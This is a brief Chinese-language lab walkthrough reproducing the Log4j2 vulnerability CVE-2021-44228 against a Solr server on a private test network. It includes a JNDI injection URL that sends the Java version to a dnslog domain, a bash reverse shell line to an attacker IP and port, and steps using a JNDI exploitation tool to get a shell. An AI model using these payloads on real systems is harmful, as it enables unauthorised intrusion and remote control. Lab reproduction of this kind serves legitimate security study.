log4j2(CVE-2021-44228)复现
1.启动漏洞环境
2.通过dnslog验证漏洞
先获取一个subdomain
3.可利用/admin/cores传参
4.构造payload 访问
http://192.168.80.134:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.9uu1fq.dnslog.cn
5.看dns回显 漏洞存在
6.反弹shell
bash -i >& /dev/tcp/192.168.80.151/1122 0>&1
对payload进行base64编码
7.利用JNDI-injection-exploit工具
8.在攻击机上监听
9.get提交 替换payload 在这其中任意一个
10.访问 建立会话